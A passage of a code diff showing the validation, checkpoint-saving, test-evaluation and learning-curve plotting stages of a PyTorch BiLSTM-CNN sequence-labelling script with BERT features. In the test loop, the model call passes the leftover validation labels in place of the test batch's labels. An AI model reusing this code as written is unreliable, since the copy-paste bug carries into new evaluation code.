+ j_batch_valid_word_sentences = torch.from_numpy(batch_valid_sents[0]).long().to(args.device)
146
+ j_batch_valid_char_sentences = torch.from_numpy(batch_valid_sents[1]).long().to(args.device)
147
+ j_batch_valid_pos_sentences = torch.from_numpy(batch_valid_sents[2]).long().to(args.device)
148
+ j_batch_valid_case_sentences = torch.from_numpy(batch_valid_sents[3]).long().to(args.device)
149
+ j_batch_valid_labels = torch.from_numpy(batch_valid_labels).long().to(args.device)
150
+
151
+ # print(batch_valid_labels)
152
+
153
+ # bert feature
154
+ j_batch_bert_valid_sents = batch_bert_valid_sents.tolist()
155
+ j_batch_bert_valid_labels = batch_bert_valid_labels.tolist()
156
+ j_batch_bert_valid_feature = bert_emission.get_bert_feature(j_batch_bert_valid_sents, j_batch_bert_valid_labels, args.device)
157
+
158
+ # input and output
159
+ j_batch_valid_loss = model(j_batch_valid_char_sentences, j_batch_valid_word_sentences, j_batch_valid_pos_sentences, j_batch_valid_case_sentences, j_batch_valid_labels, 'train', j_batch_bert_valid_feature)
160
+
161
+ # input and output
162
+ j_batch_valid_preds = model(j_batch_valid_char_sentences, j_batch_valid_word_sentences, j_batch_valid_pos_sentences, j_batch_valid_case_sentences, j_batch_valid_labels, 'test', j_batch_bert_valid_feature)
163
+
164
+ j_batch_valid_labels_flatten = [each_label for each_sent in batch_valid_labels for each_label in each_sent if each_label!=args.label_pad_indx]
165
+ j_batch_valid_preds_flatten = [each_pred_label for each_pre_sent in j_batch_valid_preds for each_pred_label in each_pre_sent]
166
+
167
+ print(j_batch_valid_labels_flatten)
168
+ print(j_batch_valid_preds_flatten)
169
+
170
+ valid_true.extend(j_batch_valid_labels_flatten) # array is also well
171
+ valid_pre.extend(j_batch_valid_preds_flatten)
172
+
173
+ valid_acml_loss = valid_acml_loss + j_batch_valid_loss.detach().cpu().item()*len(j_batch_bert_valid_sents)
174
+
175
+ valid_avg_loss = valid_acml_loss/args.num_valid
176
+ valid_loss_score.append(valid_avg_loss)
177
+ each_epoch_valid_f1 = lc_cal_f1(valid_true, valid_pre)
178
+ valid_f1_score.append(each_epoch_valid_f1)
179
+ each_epoch_valid_acc = lc_cal_acc(true_tags=valid_true, pred_tags=valid_pre)
180
+ valid_acc_score.append(each_epoch_valid_acc)
181
+ print('Validation: Epoch-{}, Val_loss-{}, Val_acc-{}, Val_f1-{}'.format(epoch, valid_avg_loss, each_epoch_valid_acc, each_epoch_valid_f1))
182
+
183
+
184
+ writer.add_scalar('val-loss', valid_avg_loss, epoch)
185
+ writer.add_scalar('val-f1', each_epoch_valid_f1, epoch)
186
+ writer.add_scalar('val-acc', each_epoch_valid_acc, epoch)
187
+
188
+ if each_epoch_valid_f1 > valid_f1_prev:
189
+ torch.save({'epoch': epoch, 'model_state': model.state_dict(), 'valid_acc': each_epoch_valid_acc,
190
+ 'valid_f1': each_epoch_valid_f1}, os.path.join(args.output_dir, 'BiLSTM_CNN_MultiHead_all.checkpoint.pt'))
191
+ valid_f1_prev = each_epoch_valid_f1
192
+
193
+ lr_decay.step(valid_avg_loss) # when there is no change about loss within patience step , lr will decay
194
+
195
+ # x_epoch = epoch
196
+ '''
197
+ if early_stop.judge(epoch, valid_f1_score[-1]):
198
+ print("Early stop at epoch {}, with val-f1 score {}".format(epoch, valid_f1_score[-1]))
199
+ print('Best performance epoch {}, with best val-f1 score {}'.format(early_stop.best_epoch, early_stop.best_val))
200
+ break
201
+ '''
202
+
203
+ print("**********************************************\n"
204
+ "******** The training is over. ********\n"
205
+ "**********************************************")
206
+
207
+ test_checkpoint = torch.load(os.path.join(args.output_dir, 'BiLSTM_CNN_MultiHead_all.checkpoint.pt'), map_location='cpu')
208
+ # parser the model params
209
+ # epoch = test_checkpoint['epoch']
210
+ test_valid_f1 = test_checkpoint['valid_f1']
211
+ test_valid_acc = test_checkpoint['valid_acc']
212
+ trained_model_dict = test_checkpoint['model_state']
213
+ # get the model param names
214
+ test_model_state_dict = model.state_dict()
215
+ # get the params interacting between model_state_dict and pretrained_model_dict
216
+ selected_model_state = {k: v for k, v in trained_model_dict.items() if k in test_model_state_dict}
217
+ test_model_state_dict.update(selected_model_state)
218
+ # load the params into model
219
+ model.load_state_dict(test_model_state_dict)
220
+ # show the details about loaded model
221
+ print('Load the best trained model, epoch:', test_checkpoint['epoch'], 'valid_acc:', test_checkpoint['valid_acc'], 'valid_f1:', test_checkpoint['valid_f1'])
222
+ model.to(args.device)
223
+ # evaluate the model
224
+ model.eval()
225
+ test_true, test_pre = [], []
226
+ # valid_acml_loss = 0
227
+ for k_batch, (batch_test_sents, batch_test_labels, batch_bert_test_sents, batch_bert_test_labels) in \
228
+ enumerate(gen_batch_data(test_sents, test_labels, bert_test_sents, bert_test_labels, args.num_test, args.batch_size)):
229
+
230
+ # remove the data to device(GPU)
231
+ k_batch_test_word_sentences = torch.from_numpy(batch_test_sents[0]).long().to(args.device)
232
+ k_batch_test_char_sentences = torch.from_numpy(batch_test_sents[1]).long().to(args.device)
233
+ k_batch_test_pos_sentences = torch.from_numpy(batch_test_sents[2]).long().to(args.device)
234
+ k_batch_test_case_sentences = torch.from_numpy(batch_test_sents[3]).long().to(args.device)
235
+ k_batch_test_labels = torch.from_numpy(batch_test_labels).long().to(args.device)
236
+
237
+ # bert feature
238
+ k_batch_bert_test_sents = batch_bert_test_sents.tolist()
239
+ k_batch_bert_test_labels = batch_bert_test_labels.tolist()
240
+ k_batch_bert_test_feature = bert_emission.get_bert_feature(k_batch_bert_test_sents, k_batch_bert_test_labels, args.device)
241
+
242
+ # input and output
243
+ k_batch_test_preds = model(k_batch_test_char_sentences, k_batch_test_word_sentences, k_batch_test_pos_sentences, k_batch_test_case_sentences, j_batch_valid_labels, 'test', k_batch_bert_test_feature)
244
+
245
+ k_batch_test_labels_flatten = [each_label for each_sent in batch_test_labels for each_label in each_sent if each_label!=args.label_pad_indx]
246
+ k_batch_test_preds_flatten = [each_pred_label for each_pre_sent in k_batch_test_preds for each_pred_label in each_pre_sent]
247
+
248
+ print(k_batch_test_labels_flatten)
249
+ print(k_batch_test_preds_flatten)
250
+
251
+ test_true.extend(k_batch_test_labels_flatten) # array is also well
252
+ test_pre.extend(k_batch_test_preds_flatten)
253
+
254
+ print('Test: test_acc-{}, test_f1-{}'.format(lc_cal_acc(true_tags=test_true, pred_tags=test_pre), lc_cal_f1(test_true, test_pre)))
255
+
256
+ # then, we will show the training and validation processing by figure.
257
+ # set the plot style from seaborn
258
+ sns.set(style='darkgrid')
259
+ # increase the plot size(line width) and figure size
260
+ sns.set(font_scale=1.5)
261
+ plt.rcParams['figure.figsize'] = [12, 6]
262
+ x_label = np.arange(0, args.total_train_epoch)
263
+
264
+ # plot the learning curve. the params are :values, color, line-title
265
+ line1, = plt.plot(x_label, train_ave_loss, color='b', label='train_average_loss') # epoch as the period
266
+ line2, = plt.plot(x_label, valid_loss_score, color='m', label='valid_average_loss')
267
+ line3, = plt.plot(x_label, valid_acc_score, color='r', label='valid_acc_score')
268
+ line4, = plt.plot(x_label, valid_f1_score,color='g', label='valid_f1_score')
269
+
270
+ # now we label the plot
271
+ plt.title('Learning curve')
272
+ plt.xlabel('Epoch')
273
+ plt.ylabel('TrainLoss/ValLoss/ValAcc/ValF1')
274
+ plt.legend(handles=[line1, line2, line3, line4], labels=['train_average_loss','valid_average_loss','valid_acc_score', 'valid_f1_score'], loc='best')
275
+ plt.savefig('MB_BiLSTM_CNN_MultiHead_all.jpg')
276
+ plt.show()